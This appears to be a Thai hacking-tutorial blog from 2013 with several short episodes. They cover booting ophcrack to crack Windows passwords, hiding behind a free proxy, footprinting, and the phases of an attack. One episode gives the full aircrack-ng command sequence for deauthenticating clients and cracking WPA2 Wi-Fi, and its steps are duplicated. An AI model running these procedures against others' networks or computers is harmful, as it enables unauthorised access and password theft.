วันจันทร์ที่ 30 กันยายน พ.ศ. 2556
ตอนที่ 12 ถอดรหัส windows ด้วย ophcrack
1.เข้าไปโหลด ophcrack ได้ตามลิงก์นี้ http://ophcrack.sourceforge.net/download.php
2.เลือก download file ที่เป็น iso
3.เอา file ที่ download ไปเขียนลงในแผ่น CD หรือ USB
4.เสียบ USB หรือใส่ CD แล้วสั่งเครื่องให้ boot USBหรือ CD
5.จากนั้นโปรแกรมจะทำการถอดรหัสโดยอัตโนมัติ ด้วยวิธี Brute Force
วิธีป้องกัน
1.ตั้ง Password ไม่น้อยกว่า 8 ตัวอักษร
2.ใช้อักขระ ตัวพิมพ์ใหญ่ พิมพ์เล็ก สลับกันไป
3.ล็อค Bios ด้วยเลย
วันอาทิตย์ที่ 29 กันยายน พ.ศ. 2556
ตอนที่ 11 ซ่อนตัวด้วย Proxy
1.เข้า google แล้วพิมพ์คำว่า เช็ค IP จะได้ดังรูป
2.เปิดแท็บอีกอันขึ้นมาเข้า google แล้วพิมพ์คำว่า free http proxy list ดังรูป
3.เข้าไปที่การตั้งค่า>เปลี่ยนการตั้งค่าของProxy>lan setting ดังรูป
4.ใส่หมายเลข IP Adress และ Port ที่เราเลือกในข้อ2
5.ลองเข้าไปเช็ค IP เหมือนครั้งแรก ก็จะเห็นว่าตรงกับที่เราเปลี่ยนค่า Proxy ลงไป
วันพุธที่ 25 กันยายน พ.ศ. 2556
ตอน10 crack wifi WPA2
1. พิมพ์คำสั่ง airmon-ng
2. พิมพ์คำสั่ง airmon-ng wlan0
3. พิมพ์คำสั่ง airmon-ng start wlan0
4. พิมพ์คำสั่ง airodump-ng mon0
5. พิมพ์คำสั่ง airodump-ng -c 11 --bssid ตามด้วย mac address -w test1234 mon0
** 11 คือ channal ส่วน test1234 จะตั้งชื่ออะไรก็ได้
6.พิมพ์คำสั่ง aireplay-ng -0 0 -a ตามด้วย mac address ที่ช่อง bssid -c และตามด้วย mac address ของ station mon0
7. aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst test1234-01.cap
8.ก็จะได้รหัสมาแล้ว
2. พิมพ์คำสั่ง airmon-ng wlan0
3. พิมพ์คำสั่ง airmon-ng start wlan0
4. พิมพ์คำสั่ง airodump-ng mon0
5. พิมพ์คำสั่ง airodump-ng -c 11 --bssid ตามด้วย mac address -w test1234 mon0
** 11 คือ channal ส่วน test1234 จะตั้งชื่ออะไรก็ได้
6.พิมพ์คำสั่ง aireplay-ng -0 0 -a ตามด้วย mac address ที่ช่อง bssid -c และตามด้วย mac address ของ station mon0
7. aircrack-ng -w /pentest/wireless/aircrack-ng/test/password.lst test1234-01.cap
8.ก็จะได้รหัสมาแล้ว
วันจันทร์ที่ 23 กันยายน พ.ศ. 2556
ตอนที่9 Footprinting
Footprinting คือ การสำรวจระบบของเป้าหมาย ว่ามีประวัติความเป็นมาอย่างไร ใช้ IP Address อะไร มีระบบอะไรเชื่อมโยงกันอยู่บ้าง E-mail Address ของผู้ดูแลระบบคืออะไร หรือแม้แต่ บริษัทนี้ประกอบกิจการอะไร กลุ่มผู้สนใจสินค้าของบริษัทคืออะไร ซึ่งข้อมูลเหล่านี้ก็เปรียบเสมือน แบบพิมพ์เขียวทางระบบความปลอดภัยขององค์กร เลยทีเดียว พวกแฮกเกอร์ทั้งหลายจึงใช้เวลาถึง 90%หมดไปกับการ Footprinting และ อีก 10 % เป็นการโจมตี วิธีการทำ Footprinting เช่น การใช้คำสั่ง nslookup การใช้คำสั่ง whois เป็นต้น เช่น nslookup www.google.com
วันอาทิตย์ที่ 8 กันยายน พ.ศ. 2556
ตอนที่8 ขั้นตอนการโจมตีของ Hacker
สำหรับวันนี้จะนำขั้นตอนการโจมตีของ Hackerซึ่งอาจจะคล้ายๆการทำงานของหน่วยรบพิเศษ มาให้ได้ลองอ่านเปรียบเทียบกันดูครับว่ามีอะไรบ้าง
Hacker
1.Reconnaissance(การสอดส่อง) คือการเก็บข้อมูลเบื้องต้น คร่าวๆ เช่น การดูเวลาการทำงานของพนักงาน การส่งเอกสาร หรือการหาตำแหน่งของพนักงาน เป็นต้น
2.Scanning(การสแกนระบบ) คือหลังจากที่เราหาข้อมูลเบื้องต้นได้แล้ว ทีนี้เราก็สามารถระบุได้ว่าเราจะเริ่มจากเป้าหมายเป็นใคร เช่น Scan หา IP เครื่องเป้าหมาย หรือแม้กระทั่งรู้ Server ของเป้าหมาย
3.Gaining Access(การเข้าถึงเป้าหมาย) คือ Hacker จะเริ่มเจาะระบบเข้าไปโดยทุกๆวิถีทางเพื่อให้ได้ข้อมูลกลับออกมาได้สำเร็จ
4.Maintaining Access(การคงสภาพทางเข้า) เมื่อ Hacker สามารถเจาะเข้าไปในระบบได้แล้ว เมื่อ Hacker ออกจากระบบแต่อยากเข้ามาได้ข้อมูลอีกในภายภาคหน้า Hacker ก็จะทำการคงสภาพการเข้าถึง เพื่อที่จะกลับเข้ามาได้อีก
5.Covering Tracks(การลบร่องรอย) เมื่อได้ข้อมูลและคงสภาพทางเข้าไว้เรียบร้อย Hacker ก็จะกระทำการลบร่องรอยของตนเองตอนเจาะระบบเข้ามา เพื่อหลีกเลี่ยงการถูกจับกุม
หน่วยรบพิเศษ
1.Reconnaissance(การสอดส่อง) เมื่อหน่วยรบพิเศษจะทำหารโจมตีเป้าหมายก็จะต้องหาข่าวก่อนว่า ศัตรูคือใคร อยู่ที่ไหน กำลังทำอะไร เป็นต้น
2.Scanning(การสแกนระบบ) เมื่อหน่วยรบพิเศษรู้ข้อมูลเบื้องต้นแล้ว ก็จะทำการสำรวจว่าและดูว่าทางด้านไหนศัตรูน้อยที่สุด มีช่องโหว่ไหนง่ายที่สุด
3.Gaining Access(การเข้าถึงเป้าหมาย) เมื่อได้ข้อมูลมามากมายแล้วหน่วยรบพิเศษก็จะทำการวางแผนต่อไปว่าเราจะโจมตีหรือแทรกแซงในรูปแบบไหน ถึงจะได้ข้อมูลออกมาได้ไวที่สุดโดยที่ศัตรูไม่รู้ตัว
4.Maintaining Access(การคงสภาพทางเข้า) เมื่อหน่วยรบพิเศษได้ทำการโจมตีหรือแทรงแซงเข้าไปเรียบร้อยแล้วก็มักจะสร้างเส้นทางที่ปลอดภัยของตัวเองขึ้นมาเพื่อให้สามารถกลับเข้ามาเอาข้อมูลได้อีกครั้งอย่างปลอดภัย
5.Covering Tracks(การลบร่องรอย) เมื่อโจมตีหรือแทรกแซงเสร็จเป็นที่เรียบร้อยหน่วยรบพิเศษจะต้องไม่ลืมลบร่องรอยของตนเองตั้งแต่การหาข้อมูล การโจมตีหรือแทรกแซง โดยที่ไม่ให้ศัตรูรู้ได้เลยว่ามีหน่วยรบพิเศษเข้ามาในฐานของตนเองได้
สมัครสมาชิก:
บทความ (Atom)